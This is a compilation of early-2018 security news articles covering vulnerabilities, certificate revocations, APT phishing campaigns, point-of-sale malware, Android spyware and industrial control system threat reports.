Bugcrowd currently operates the rewards programs of more than 70 different companiesnincluding security firms BitDefender, Centrify, NETGEAR, 1Password, Okta, Cylance, LastPass. Industry customers include MasterClass, Fiat Chrysler, Square, Fitbit, Mastercard, Tesla and Western Union. A recently announced Samsung Electronics' Mobile Security program rewards security researchers up to $200,000 per vulnerability, depending on its severity.

Existing investors Blackbird Ventures, Costanoa Ventures, Industry Ventures, Paladin Capital Group, Rally Ventures, Salesforce Ventures and Stanford participated in the Series C round, along with new investors Hostplus and First State Super.


Remotely Exploitable Flaws Patched in DHCP
2.3.2018 securityweek 
Vulnerebility

Updates released by the Internet Systems Consortium (ISC) for the Dynamic Host Configuration Protocol (DHCP) software patch two remotely exploitable vulnerabilities discovered by a researcher at Google.

Felix Wilhelm of the Google Security Team found that the DHCP Client (dhclient), which provides a means for configuring network interfaces, is affected by a buffer overflow vulnerability that allows a malicious server to cause the client to crash.

In some cases, exploitation of the flaw could also lead to remote code execution, ISC said in an advisory. The security hole is tracked as CVE-2018-5732 and rated high severity.

“Where they are present, operating system mitigation strategies such as address space layout randomization (ASLR) should make it difficult to leverage this vulnerability to achieve remote code execution but we can not rule it out as impossible. The safest course is to patch dhclient so that the buffer overflow cannot occur,” ISC said.

The second vulnerability, CVE-2018-5733, is a medium severity issue that can be exploited to exhaust the memory available to the DHCP daemon (dhcpd), resulting in a denial-of-service (DoS) condition to clients.

“A malicious client which is allowed to send very large amounts of traffic (billions of packets) to a DHCP server can eventually overflow a 32-bit reference counter, potentially causing dhcpd to crash,” ISC said.

The flaws affect DHCP versions 4.1.0 through 4.1-ESV-R15, 4.2.0 through 4.2.8, 4.3.0 through 4.3.6, and 4.4.0. Fixes are included in versions 4.1-ESV-R15-P1, 4.3.6-P1 and 4.4.1.

ISC said there was no evidence that the vulnerabilities had been exploited for malicious purposes.

The organization has also informed customers of a vulnerability affecting BIND Supported Preview Edition, which is a customer-only, non-public version of BIND. The flaw, tracked as CVE-2018-5734 and rated high severity, can lead to an assertion failure, which typically causes the software to crash.


23,000 Digital Certificates Revoked in DigiCert-Trustico Spat
2.3.2018 securityweek Security

Digicert vs Trustico

Certificate Authority (CA) DigiCert on Wednesday announced the en-masse revocation of more than 23,000 HTTPS certificates after certificate reseller Trustico sent over the private keys for those certificates.

The keys are supposed to be secret and only in the possession of certificate owners, not in the hands of the certificate authority, the reseller or any other third party. With the private keys exposed, DigiCert was forced to revoke impacted certificates within 24 hours, thus affecting a large number of customers.

The revocation appears to be the result of a one-month feud between Trustico and DigiCert and might evolve into an even larger number of certificates being axed.

This all apparently started on February 2, 2018, when Trustico sent a request to DigiCert “to mass revoke all certificates that had been ordered by end users through Trustico,” Jeremy Rowley, Executive VP of Product at DigiCert, explains. The CA refused, given the large number of certificates it was asked to revoke at once (50,000).

In August last year, DigiCert announced plans to buy Symantec’s website security and related public key infrastructure (PKI) solutions, after Symantec ended up in the crosshairs for wrongfully issuing TLS certificates on several occasions. Since December 1, 2017, Symantec SSL certificates have been issued by DigiCert.

With major browsers already announcing plans to distrust older Symantec certificates, Trustico too decided to abandon those certificates, and announced in mid-February that it would cease to offer Symantec branded SSL Certificates: Symantec, GeoTrust, Thawte and RapidSSL.

“As a valued partner of Comodo, Trustico have updated their systems to minimize disruption to customers with their API and ordering processes by enabling the automatic selection and ordering of equivalent products from the Comodo range,” Trustico said at the time.

A couple of weeks later, on February 27, Trustico sent DigiCert a file with 23,000 private keys matching certificates issued to reseller’s customers, which triggered a 24-hour revocation process.

“Trustico’s CEO indicated that Trustico held the private keys for those certificates, and then emailed us approximately 20,000 certificate private keys. When he sent us those keys, his action gave us no choice but to act in accordance with the CA/Browser Forum Baseline Requirements, which mandate that we revoke a compromised certificate within 24 hours,” DigiCert said in a Wednesday statement.

Because of these actions, starting today, visitors of impacted websites will see in their browsers that the connection to the domain is untrusted, unless the revoked certificates have been replaced in the meantime.

Since the beginning of February, DigiCert and Trustico have been communicating with each other over this, but each company has a different side of the story.

According to DigiCert, Trustico informed them that the certificates had been compromised and that it was in the possession of said private keys. Thus, DigiCert requested proof of compromise and received said keys.

“At this time, Trustico has not provided any information about how these certificates were compromised or how they acquired the private keys. As is standard practice for a Certificate Authority, DigiCert never had possession of these private keys,” Rowley says.

In addition to revoking the certificates, DigiCert decided to email all impacted customers to inform them on its action: “Following our standard revocation process, we gave notice via email to each certificate holder whose private keys had been exposed to us by Trustico, so they could have time to get a replacement certificate.”

Trustico, on the other hand, claims that it never said the certificates had been compromised, but that it informed DigiCert that it believed “Symantec to have operated our account in a manner whereby it had been compromised.”

The reseller also says that it doesn’t believe it to be “ideal to have any active SSL Certificates on the Symantec systems,” especially with Chrome set to distrust of all Symantec SSL certificates.

“The same management team responsible for that situation is duly employed at DigiCert and are fully managing our account, causing grave concern on our part as it appears to be business as usual with a new name. We were also a victim whereby Symantec mis-issued SSL Certificates owned by us, subsequently we were asked to keep the matter quiet, under a confidentially notice,” the company claims.

Moreover, Trustico points out that it never authorized DigiCert to email its customers about the revocation, but adds that it too sent a notice to the impacted clients.

The bottom line here, however, is the fact that DigiCert ended up revoking 23,000 HTTPS certificates because their private keys were compromised. Even if the keys hadn’t been compromised when the spat started, the fact that the reseller sent those keys in an email represented a compromise in itself.

“In communications today, Trustico has suggested that this revocation is due to the upcoming Google Chrome distrust of Symantec roots. That is incorrect. We want to make it clear that the certificates needed to be revoked because Trustico sent us the private keys; this has nothing to do with future potential distrust dates,” DigiCert points out.

The fact that Trustico kept those private keys on their platform is also worrisome.

Both Trustico and DigiCert said they would be working with the impacted customers to replace the axed certificates and that free replacement certificates are available for those clients.


Russia-linked Hackers Directly Targeting Diplomats: Report
2.3.2018 securityweek  APT

The Russia-linked cyber espionage group Sofacy has been targeting foreign affairs agencies and ministries worldwide in a recently discovered campaign, Palo Alto Networks warns.

The hacking group, also known as APT28, Fancy Bear, Pawn Storm, Sednit, Tsar Team, and Strontium, has been highly active recently, and new evidence shows activity directly targeting diplomats in North America and Europe, including those at a European embassy in Moscow.

Sofacy was supposedly behind the attacks on the 2016 United States presidential election, but also hit Ukraine and NATO countries. In fact, the group heavily targeted NATO in early 2017, when it even used zero-day exploits, but then started to shift its focus towards the Middle East and Central Asia.

Palo Alto Networks has now uncovered two parallel efforts within a new Sofacy campaign, each using its own set of tools for attacks. One of the efforts was observed in the beginning of February 2018 to use phishing emails as the attack vector, to target an organization in Europe and another in North America.

The message spoofed the sender address of Jane’s by IHSMarkit, a well-known supplier of information and analysis. The email carried an attachment claiming to be a calendar of events relevant to the targeted organizations, but was a Microsoft Excel spreadsheet containing a malicious macro script.

The attackers used a white font color to hide the content of the document to the victim and lure them into enabling macros. Once that happens, the script changes the text color to black.

The macro also retrieves content from several cells to obtain a base64 encoded payload, writes it to a text file in the ProgramData folder, and leverages the command certutil -decode to decode the contents to an .exe file, which it runs after two seconds.

The executable is a loader Trojan that decrypts an embedded payload (DLL) and saves it to a file. Next, it creates a batch file to run the DLL payload, and writes the path to the batch file to a registry key, for persistence.

The installed malware is a variant of SofacyCarberp, which has been extensively used by the threat group in attacks. The malware performs initial reconnaissance by gathering system information, then sends the data to the command and control (C&C) server and fetches additional tools.

Both the loader and the SofacyCarberp variant used in the attack are similar to samples previously analyzed, yet they include several differences, such as a new hashing algorithm to resolve API functions and find browser processes for injection, and modified C&C communication mechanisms.

The security researchers also believe the group may have used the Luckystrike open-source tool to generate the malicious document and/or the macro, as the macro in the document closely resembles those found within the Microsoft PowerShell-based tool. The only difference between the two, besides random function name and random cell values, would be the path to the “.txt” and “.exe” files.

The security researchers also noticed that the Sofacy group registered new domains as part of the campaign, but that it used a default landing page they employed in other attacks as well. The domain used in this attack, cdnverify[.]net was registered on January 30, 2018.

“No other parts of the C&C infrastructure amongst these domains contained any overlapping artifacts. Instead, the actual content within the body of the websites was an exact match in each instance,” Palo Alto notes.

“The Sofacy group should no longer be an unfamiliar threat at this stage. They have been well documented and well researched with much of their attack methodologies exposed. They continue to be persistent in their attack campaigns and continue to use similar tooling as in the past. This leads us to believe that their attack attempts are likely still succeeding, even with the wealth of threat intelligence available in the public domain,” Palo Alto concludes.


Hundreds of Tim Hortons outlets across Canada closed after malware attack
2.3.2018 securityaffairs
Attack

Tim Hortons restaurants across Canada have been hit by a computer malware that forced some locations to shut down over the past week.
When dealing with cyber threats for the retail sector, Target in most prominent case of potential damages from a cyber attack.

Today I want to report you the case of a malware-based attack that hit payment systems of hundreds of Tim Hortons restaurants across Canada forcing many of them to close.

“The company told the Globe and Mail that the virus hit fewer than 100 locations, attacking the Panasonic cash registers that the chain uses.” reported the Huffington Post Canada.

“But a source close to the issue told HuffPost Canada that as many as 1,000 Tim Hortons locations may have been impacted, amounting to roughly a quarter of all Canadian locations. Some locations were forced to close, while others had to shut down their drive-throughs.”

At the time of writing, there are no details about the type of malware that infected the systems at Tim Hortons restaurants, CTVNews quoting sources close to the incident reported that the malicious code was specifically designed to target cash registers making them unusable.

“The cash registers just plain don’t work,” the source told the news station “Many or the stores had to close totally.”

The Great White North Franchisee Association (GWNFA) which represents Tim Hortons franchisees is expected to take legal action against the Restaurant Brands International (RBI), the operator of Tim Hortons.

GWNFA accuses them of loss of revenue and of course reputational damage.

Tim Hortons locations malware

In a letter obtained by the Globe and the Canadian Press, Tim Hortons franchisees belonging to the Great White North Franchisee Association asked head office for compensation for losses due to the virus.

“The business interruption includes inability to use some or all of the … issued cash registers and [point-of-sale] terminals, causing partial and complete store closures, franchisees paying employees not to work, lost sales and product spoilage,” the letter from law firm Himelfarb Proszanski reportedly stated.

The letter defined the incident “a failure” and noted that it comes “on the heels of the public relations debacle” from January when two Cobourg, Ont. franchises owned by Ron Joyce Jr. and Jeri Horton-Joyce, the children of the company’s billionaire co-founders, moved to offset the province’s minimum wage hike by cutting paid breaks and forcing workers to cover a bigger share of their benefits.

According to the CTVNews, RBI has declared that no financial (i.e. data credit card information) and sensitive data was stolen by hackers.


Financial Cyberthreats in 2017
2.3.2018 Kaspersky   FINANCIAL CYBERTHREATS IN 2017  Cyber
In 2017, we saw a number of changes to the world of financial threats and new actors emerging. As we have previously noted, fraud attacks in financial services have become increasingly account-centric. User data is a key enabler for large-scale fraud attacks, and frequent data breaches – among other successful attack types – have provided cybercriminals with valuable sources of personal information to use in account takeovers or false identity attacks. These account-centric attacks can result in many other losses, including those of further customer data and trust, so mitigation is as important as ever for both businesses and financial services customers.

Attacks on ATMs continued to rise in 2017, attracting the attention of many cybercriminals, with attackers targeting bank infrastructure and payment systems using sophisticated fileless malware, as well as the more rudimentary methods of taping over CCTVs and drilling holes. In 2017, Kaspersky Lab researchers uncovered, among other things, attacks on ATM systems that involved new malware, remote operations, and an ATM-targeting malware called ‘Cutlet Maker’ that was being sold openly on the DarkNet market for a few thousand dollars, along with a step-by-step user guide. Kaspersky Lab has published a report outlining possible future ATM attack scenarios targeting ATM authentication systems.

It is also worth mentioning that major cyber incidents continue to take place. In September 2017, Kaspersky Lab researchers identified a new series of targeted attacks against at least 10 financial organizations in multiple regions, including Russia, Armenia, and Malaysia. The hits were performed by a new group called Silence. While stealing funds from its victims, Silence implemented specific techniques similar to the infamous threat actor, Carbanak.

Thus, Silence joins the ranks of the most devastating and complex cyber-robbery operations like Metel, GCMAN and Carbanak/Cobalt, which have succeeded in stealing millions of dollars from financial organizations. The interesting point to note with this actor is that the criminals exploit the infrastructure of already infected financial institutions for new attacks: sending emails from real employee addresses to a new victim, along with a request to open a bank account. Using this trick, criminals make sure the recipient doesn’t suspect the infection vector.

Small and medium-sized businesses didn’t escape financial threats either. Last year Kaspersky Lab’s researchers discovered a new botnet that cashes-in on aggressive advertising, mostly in Germany and the US. Criminals infect their victims’ computers with the Magala Trojan Clicker, generating fake ad views, and making up to $350 from each machine. Small enterprises lose out most because they end up doing business with unscrupulous advertisers, without even knowing it.

Moving down one more step – from SMEs to individual users – we can say that 2017 didn’t give the latter much respite from financial threats. Kaspersky Lab researchers detected NukeBot – a new malware designed to steal the credentials of online banking customers. Earlier versions of the Trojan were known to the security industry as TinyNuke, but they lacked the features necessary to launch attacks. The latest versions however, are fully operable, and contain code to target the users of specific banks.

This report summarizes a series of Kaspersky Lab reports that between them provide an overview of how the financial threat landscape has evolved over the years. It covers the common phishing threats that users encounter, along with Windows-based and Android-based financial malware.

The key findings of the report are:

Phishing:
In 2017, the share of financial phishing increased from 47.5% to almost 54% of all phishing detections. This is an all-time high, according to Kaspersky Lab statistics for financial phishing.
More than one in four attempts to load a phishing page blocked by Kaspersky Lab products is related to banking phishing.
The share of phishing related to payment systems and online shops accounted for almost 16% and 11% respectively in 2017. This is slightly more (single percentage points) than in 2016.
The share of financial phishing encountered by Mac users nearly doubled, accounting for almost 56%.
Banking malware:
In 2017, the number of users attacked with banking Trojans was 767,072, a decrease of 30% on 2016 (1,088,900).
19% of users attacked with banking malware were corporate users.
Users in Germany, Russia, China, India, Vietnam, Brazil and the US were the most often attacked by banking malware.
Zbot is still the most widespread banking malware family (almost 33% of attacked users), but is now being challenged by the Gozi family (27.8%).
Android banking malware:
In 2017, the number of users that encountered Android banking malware decreased by almost 15% to 259,828 worldwide.
Just three banking malware families accounted for attacks on the vast majority of users (over 70%).
Russia, Australia and Turkmenistan were the countries with the highest percentage of users attacked by Android banking malware.


SecOps: The Roadkill Victim of DevOps' Need for Speed
1.3.2018 securityweek Security

DevSecOps Remains a Theory Not Often Implemented in Practice

DevOps was born from the understanding that greater efficiency comes from breaking down business silos (in this case, development and operations) and working as a single unit. With the increasing understanding and regulatory demands that security should be baked into new products during their development, the logical extension is that security should be included in a new combined working model: DevSecOps.

The potential advantages of DevSecOps are well understand and frequently urged -- but not so commonly implemented. A new survey and report (PDF) from threat detection firm Threat Stack demonstrates that DevSecOps remains a theory not often implemented in practice.

Threat Stack questioned more than 200 security, development and operations professionals working for firms ranging from SMBs to large corporations in North America, across multiple industry sectors. The response shows that DevSecOps is well-understood and frequently lauded by firms, but not so often enacted.

The primary reason appears to be not just a lack of support from the highest levels, but actual discouragement from business leaders. More than half of companies (52%) admit to cutting back on security measures to meet a business deadline or objective. "Since the directive for speed starts at the very top, it's hard to ignore;" comment the report's authors; "even if it means that security becomes roadkill in the process."

The demand for development speed from the business leaders then transfers to the existing DevOps team. Sixty-two percent of the responders said that DevOps push back against demands to deploy secure technology, and 57% push back on security best practices -- presumably because implementing security is seen as incompatible with the overriding need for speed.

This is a common perception. Mike Smart, security strategist at Forcepoint, believes security is like the brake on a car. Business leaders think its purpose is to slow down the car; that is, security slows down business and business development. "Innovators will tell you the opposite," he says. "It's there to give the driver the confidence to go as fast as possible." In this view, security is the enabler of agile business -- but the implication is that security leaders have failed to adequately explain this function to the business leaders.

Surprisingly, however, the theory of DevSecOps is well received. Eighty-five percent of the responding organizations claim that bridging the gap between DevOps and security is an important goal, while 62% of developer and operations professionals say it has become a bigger priority.

Threat Stack has isolated three key factors at play in this apparent contradiction. The first is that security is still siloed and considered a separate function. "A security specialist," notes the report, "is assigned to the operations team at only 27% of the organizations we surveyed, and security pros are on board with development teams in just 18% of cases. At 38% of organizations, security is a completely separate team that is only brought in 'when needed'."

The second is that development is separate from security. "Forty-four percent of developers aren't trained to code securely. Without this basic knowledge, coding is often done without security in mind. This forces security to become a bottleneck when they must inevitably step in and intervene."

Thirdly, operations is little different. "A full 42% of operations staff admit that they are not trained in basic security practices, which means that they can't configure servers securely. It also means that they don't see deploying security as part of the configuration management process, which allows security best practices to fall by the wayside. When ops pros aren't trained in security, there's no way SecOps can succeed."

At the same time, security cannot be absolved from all responsibility for the lack of progress in DevSecOps. Just as developers can't code securely, security teams can rarely code at all. Security teams, suggests Threat Stack, "need to learn how to code and integrate their efforts into continuous deployment cycles. Don't wait for this process to happen organically; you must make a conscious investment in alignment and education across teams."

"Businesses have grappled with the 'Speed or Security' problem for years but the emergence of SecOps practices really means that companies can achieve both," said Brian Ahern, Threat Stack chairman and CEO. "The survey findings show that the vast majority of companies are bought-in, but, unfortunately, a major gap exists between intent of practicing SecOps and the reality of their fast-growing businesses. It's important that stakeholders across every enterprise prioritize the alignment of DevOps and security."

The key to developing an efficient DevSecOps regime is to break down silos -- but that includes breaking down self-imposed as well as organizationally-imposed silos.

Boston, Mass.-based intrusion detection firm Threat Stack raised $45 million in a Series C funding in September 2017, bringing the total raised by the company to more than $70 million.


Fortinet Enhances Network Security OS, Adds AI-based Threat Detection
1.3.2018 securityweek Security

Two major new product announcements were made at Fortinet’s Accelerate 18 conference this week, including a new machine learning (ML) threat intelligence and detection offering, along with a major upgrade to the Fortinet Security Fabric (FortiOS).

Accelerate 18, held in Las Vegas, Nevada, is Fortinet's annual global partner and user conference, attended by around 2,000 Fortinet partners, customers, and industry and technical experts.

The new ML product is called FortiGuard AI. It emerges from five years of analyses by FortiGuard Labs' 215 researchers in 31 countries analyzing the threat data from a global network of more than 3 million security sensors. The analyses have been used, employing supervised learning techniques, to train the FortiGuard AI automatic detection engine.

Fortinet LogoMachine learning threat detection is currently the best option for detecting new and unknown malware. But the accuracy of machine learning detection systems depends on the volume and accuracy of the data from which it learns. By spending five years in the process, and using supervised learning (that is, under the control of human analysts), rather than unsupervised learning, the quality and accuracy of Fortinet's ML system should be high.

The system now analyzes millions of threat samples every week. More than 5 billion processing nodes identify both the clean and malicious features of the threat samples to generate threat intelligence. That intelligence then automatically updates defensive signatures across the entire Fortinet Security Fabric.

"Fortinet Labs' five-year investment in automated analysis and detection of polymorphic threats," comments CISO Phil Quade, "has resulted in FortiGuard AI, a giant leap towards [automatically detecting polymorphic and zero-day threats]. FortiGuard AI analyzes and identifies threats with speed, agility, and accuracy to provide proactive threat detection at machine speed and scale. This frees threat analysts and network operators to focus on critical threat research and higher-order problems, reduces exposure to zero-day attacks, and minimizes the risk to Fortinet customers while increasing the attacker's costs."

The firm also announced the inclusion ML-based User and Entity Behavior Analysis (UEBA) capabilities into its SIEM product (FortiSIEM). The solution 'learns' patterns of normal user or entity behavior, and will then automatically detect anomalies. Concurrent logins from separate locations, users accessing corporate data in the middle of the night, and excessive logins to rarely used servers will all send alerts to the security team for relevant action.

Fortinet has also announced version 6 of its Security Fabric. "FortiOS 6.0," says founder, president and CTO Michael Xie, "delivers hundreds of new features and capabilities that were designed to provide the broad visibility, integrated threat intelligence and automated response required for digital business."

The Security Fabric is based on the world's most deployed network security operating system. It was launched in 2016 to allow different segments of network security to integrate seamlessly and to cooperate actively under the management of a central control. FortiOS 6.0 is expected to be available before the end of March 2018.

Example enhancements include multi-cloud visibility, where cloud connectors provide visibility spanning private clouds (with support for VMware NSX, Cisco ACI and Nokia Nuage); public clouds (supporting AWS, Azure, Google Cloud and Oracle Cloud); and SaaS clouds with CASB connectors (supporting Salesforce.com, Office 365, Dropbox, Box, AWS and more).

FortiClient 6.0 includes expanded OS support for Linux, providing IoT endpoint security. Actionable insights from the IoT devices can be shared with the Security Fabric, while telemetry can provide a deeper insight on what is running on a network's endpoint devices to quickly identify vulnerabilities.

Other enhancements involve network security, advanced threat protection, email and web applications, security management and analytics, and unified access.

"Using a single partner for integrated protection across multiple threat vectors, from public cloud workloads to email SaaS applications, is a key priority for ShipServ," says Dominic Aslan, VP of IT operations at the online marketplace for the marine industry. "Fortinet is an all-in-one cyber security company with a common, intuitive security management interface across all the Fortinet Security Fabric solutions, making it much easier to support."


Russian Hackers Infiltrated German Ministries' Network: Report
1.3.2018 securityweek BigBrothers

Berlin - Russian hackers have infiltrated Germany's foreign and interior ministries' online networks, German news agency DPA reported Wednesday quoting unnamed security sources.

The hacker group known as APT28 -- which has been linked to Russia's GRU military intelligence and accused of attacks on Hillary Clinton's 2016 presidential campaign -- managed to plant malware in the ministries' networks for possibly as long as a year, the news agency said.

German security authorities only detected the online spying in December, it said, adding that an isolated government IT network had also been hit.

If confirmed, the attack would be the biggest to hit the German government.

Top security officials had repeatedly warned during Germany's 2017 general elections that Russia hackers may seek to disrupt the polls.

While authorities did not have concrete proof, they have pinned the malware attack that crippled the Bundestag parliamentary network in 2015 for days on the APT28, also known as "Fancy Bear" or "Sofacy".

The attack netted 17 gigabytes of data which, officials feared, could be used to blackmail MPs or discredit them.

Amid the rising frequency of attacks, Germany's defence ministry in 2016 set up a cyber department to coordinate a response to online intrusions.


"RedDrop" Mobile Malware Records Ambient Audio
1.3.2018 securityweek Android

A newly detailed mobile malware can do more than steal data from infected devices: it can also record ambient audio and send the recordings to cloud storage accounts controlled by attackers.

Dubbed RedDrop, the malware can also inflict financial costs on victims by sending SMS messages to premium services, security firm Wandera says. The U.K.-based company has discovered 53 malware-ridden apps that are exfiltrating sensitive data from infected devices.

RedDrop-infected applications are being distributed through a network of more than 4,000 domains and range from tools such as image editors and calculators to recreational apps. Every observed application offers the expected functionality, thus hiding the malicious content stored within.

Once the user installs an application from the RedDrop family, invasive permissions are requested, so that the next steps of the attack would be performed without additional user interaction, the security researchers reveal. The malware even asks for permissions that allow it to persist between reboots and to continuously communicate with its command and control (C&C) servers.

To lure victims to their malicious network, the attackers even display ads on the popular Chinese search engine Baidu. One such ad would take the user to huxiawang.cn, the primary distribution site for the attack, which encourages users to download one of the 53 malicious apps.

Once the user installs a RedDrop-infected application, 7 additional APKs are silently downloaded and executed on the device, each meant to enable additional malicious functionality. The downloaded components are stored dynamically into the device’s memory.

One of the observed applications (CuteActress) was designed to send an SMS message to a premium service each time the user would touch the screen to interact with the app’s legitimate functionality. The threat would also delete all of these messages, thus erasing any evidence of these premium SMS.

The RedDrop malware family also includes a set of spyware tools capable of extracting valuable and damaging data from the victim’s device. The Wandera researchers associated encrypted and unencrypted data, encoded data and TCP streams to RedDrop’s exfiltration activities.

Stolen data includes locally saved files (such as photos and contacts), device-related information (IMEI, IMSI, etc), SIM info (MNC, MCC, etc), application data, and information on nearby Wi-Fi networks. More disturbing is the fact that RedDrop can also record an audio of device’s surroundings.

According to Wandera, RedDrop is one of the most sophisticated Android malware families, given the range of functioning malicious applications it hides behind and its complex distribution network. The malware is expected to remain active even after the applications are flagged as malicious, and new variants are expected to emerge in the coming months.

“This multifaceted hybrid attack is entirely unique. The malicious actor cleverly uses a seemingly helpful app to front an incredibly complex operation with malicious intent. This is one of the more persistent malware variants we’ve seen,” Dr Michael Covington, VP of Product Strategy at Wandera, says.

According to Craig Young, computer security researcher for Tripwire, this is not the first time Android malware that includes such extensive spyware capabilities has been discovered and the research appears exaggerated.

“This looks more like a very amateur trial run of Android malware rather than “one of the most sophisticated pieces of Android malware” as claimed by Wandera,” Young told SecurityWeek in an emailed comment.

He also pointed out that the malware’s ability to record and upload calls “provides minimal value outside of targeted attacks and potentially makes the malware more apparent by draining a victim’s battery quickly.”

Young recommends paying extra attention to the permissions applications may request, as this is a great means to stay safe from infections.

“With Android 6 (released 2015), apps will request permissions at runtime which should make it abundantly obvious when a malicious app wants to do something like sending SMS or recording audio. Users of older Android releases must rely instead on reviewing the requested permissions at install time to confirm that they are appropriate for the app,” Young concluded.


Five Threat Groups Target Industrial Systems: Dragos
1.3.2018 securityweek ICS

There are at least five sophisticated threat groups whose activities focus on industrial control systems (ICS), according to a report published on Thursday by industrial cybersecurity firm Dragos.

While it’s not uncommon for non-targeted malware to make its way onto industrial systems, targeted attacks have also become increasingly common. Dragos currently tracks five threat actors that have either attacked ICS directly or have shown an interest in gathering information on these types of systems.

One of these groups is tracked by the security firm as Electrum. This is the actor behind the CRASHOVERRIDE/Industroyer malware used in December 2016 to cause a power outage in Ukraine. Electrum has been linked to Sandworm Team, which is believed to be responsible for a 2015 power outage in Ukraine. Russia has been accused for both attacks.

While it apparently hasn’t launched any major attacks since the 2016 campaign targeting Ukraine’s energy sector, Dragos says Electrum continues to be active, and evidence suggests it has expanded targets.Five threat groups target ICS

“While past ELECTRUM activity has focused exclusively on Ukraine, information from low- level ongoing events and the group’s link to SANDWORM Dragos assesses that ELECTRUM could be ‘re-tasked’ to other areas depending on the focus of their sponsor,” Dragos said in its report.

Another gang tracked by Dragos is Covellite, which has been linked to North Korea’s Lazarus group. Researchers started observing Covellite in September 2017, when it launched a highly targeted phishing campaign against a U.S. electric grid company. They later spotted attacks that may have been conducted by this group aimed at organizations in Europe, North America and East Asia.

Unlike Electrum, Covellite has yet to use malware specifically designed to target industrial systems in its campaigns.

Dragos’ report also summarizes the activities of Dymalloy, a group whose attacks came to light during an investigation into Dragonfly, an actor that is also known as Crouching Yeti and Energetic Bear. Dragonfly, which is believed to be operating out of Russia, is known for its sophisticated Havex malware, and it was recently observed targeting control systems in U.S. energy firms.

Dragos believes Dymalloy is not linked – at least not directly – to Dragonfly and its tools are not as advanced as Havex. However, the hackers did manage to breach ICS organizations in Turkey, Europe and North America, gaining access to HMI devices.

Experts say Dymalloy appears to have become less active since early 2017, possibly in response to attention from the media and security researchers.

Since mid-2017, Dragos has been tracking a group it has named Chrysene, whose activity focuses on North America, Western Europe, Israel and Iraq, particularly organizations in the electricity generation and oil&gas sectors.

Chrysene, which continues to be active, has used a unique variation of a framework associated with the Iran-linked cyber espionage groups known as OilRig and Greenbug.

“While CHRYSENE’s malware features notable enhancements over related threat groups using similar tools, Dragos has not yet observed an ICS-specific capability employed by this activity group. Instead, all activity thus far appears to focus on IT penetration and espionage, with all targets being ICS-related organizations,” Dragos said.

It’s worth noting that the recently uncovered piece of malware known as Trisis/Triton, which is the first threat specifically designed to disrupt safety instrumented systems (SIS), has also been linked by some researchers to Iran.

The last ICS-focused threat group monitored by Dragos is Magnallium, which has also been linked to Iran. The security firm started tracking this actor following a report from FireEye on the activities of APT33.

While some media reports portrayed APT33 as a serious threat to ICS and critical infrastructure, Dragos’ investigation showed that the group does not appear to possess any ICS-specific capabilities.

“While only one [of these groups] has demonstrated an apparent capability to impact ICS networks through ICS-specific malware directly, all have engaged in at least reconnaissance and intelligence gathering surrounding the ICS environment,” Dragos said.

“These groups have remained relatively constant regarding overall activity throughout the year, and Dragos is confident that additional unknown events have occurred,” the company added.


Public Advisories Fail to Convey True Impact of ICS Flaws
1.3.2018 securityweek ICS

Public advisories describing vulnerabilities in industrial control systems (ICS) often fail to convey the true impact of the flaws, according to a report published today by ICS cybersecurity firm Dragos.

An analysis of 163 advisories published last year by ICS-CERT and others – excluding reports on medical device flaws, which ICS-CERT regularly covers – allowed Dragos to compile some useful statistics.

The company determined that patches for nearly two-thirds of the security holes disclosed last year don’t fully eliminate the risk due to the fact that the affected systems had been insecure by design.

Another interesting point made by Dragos in its report is that 85% of the vulnerabilities can be exploited late in the kill chain and they are not useful for getting an initial foothold in the targeted organization’s network. This means that an attacker who manages to exploit the flaws has had access to the target’s network for some time.

Once exploited, one-third of the vulnerabilities lead to what Dragos describes as “loss of view,” which results in the victim not being able to monitor or read the state of the compromised system.

In 29% of cases, exploitation of the bugs leads to “loss of control,” preventing any modifications to the state of the system. In roughly the same percentage of cases, exploitation of a flaw leads to both loss of control and loss of view.

“Vulnerabilities which lead to both a loss of view and control occur in the core of traditional control networks affecting both field devices (PLCs, RTUs, etc.) as well as management such as human-machine interface (HMI) systems and engineering workstation (EWS) software,” Dragos explained in its report. “This means that a large percentage (61%) of ICS-related vulnerabilities will cause severe operational impact if exploited.”

Learn More at SecurityWeek’s ICS Cyber Security Conference

Many of the flaws covered by the advisories analyzed by Dragos affect products that are further away from the perimeter of the operational technology (OT) network, which makes them less likely to be exploited.

However, 15% of advisories describe vulnerabilities in components located very close to the network perimeter. Systems such as historians, OPC servers, firewalls, VPN products, and cellular gateways are often directly accessible from the business network and even from the Internet, which makes them more likely to be attacked.

Nearly one-quarter of the weaknesses impact field devices, while 31% affect HMIs.

ICS component vulnerabilities

“Most of the control system vulnerability patching focus should be placed on the 30% of vulnerabilities which impact exterior-facing systems,” Dragos said. “Since so many assets and interior control elements are nowhere near a network border, applying patches in the 85% of interior and none-to-medium proximity cases would likely have little to no reduction in risk for impact against attack.”

Dragos also busted a common myth claiming that most ICS vulnerabilities are found in demo or free software rather than actual control systems. However, the company found that 63% of all ICS-related flaws disclosed last year impacted software or hardware that could not have been obtained for free.

The security firm’s analysis also revealed that 72% of public advisories describing ICS flaws did not provide any alternative mitigations. According to Dragos, recommending the use of VPNs and trusted networks, which is included in most advisories, does not count as alternative mitigations.


RedDrop, a new Android Malware records ambient Audio and exfiltrate user’s data
1.3.2018 securityaffairs Android

RedDrop malware is a recently discovered mobile threat that can steal data from infected devices and also record ambient audio.
Security researchers at Wandera have spotted a new sophisticated family of mobile malware dubbed RedDrop that can steal data, record audio, and intercept SMS. All data stolen from infected systems is uploaded to remote file storage systems.

The malicious code was found in dozens of apparently innocuous apps, the researchers discovered RedDrop hidden in 53 Android applications, including image editors, calculators, language learning apps and space exploration apps.

The applications work as expected and the RedDrop malware is executed in the background.

“The latest zero-day threat to be discovered by Wandera’s mobile threat research team is RedDrop, a family of mobile malware inflicting financial cost and critical data loss on infected devices.” reads the analysis published by Wandera. “The most worrying part? The 53 malware-ridden apps are exfiltrating sensitive data – including ambient audio recordings – and dumping it in the attackers’ Dropbox accounts to prepare for further attacks and extortion purposes.”

Once an infected app is installed, it downloads at least seven more Android Application Packages (APKs) from a different command and control server, each of them implements a malicious functionality. The APKs are stored in the memory of the device, this trick allows to execute them without including the feature in the original malware sample.

The RedDrop malware could also send SMS message to a premium service and then instantly deletes the message to avoid detection by the user.

The researchers discovered that the malicious Apps are distributed from a complex network composed of more than 4,000 domains registered to the same underground group that might be operating out of China.

“Wandera’s machine learning detections first uncovered one of the RedDrop apps when a user clicked on an ad displaying on popular Chinese search engine Baidu.” continues the analysis. “The user was then taken to huxiawang.cn, the primary distribution site for the attack. The landing pages that follow host various content to encourage and incite the user to download one of the 53 apps within the RedDrop family of malicious apps.”

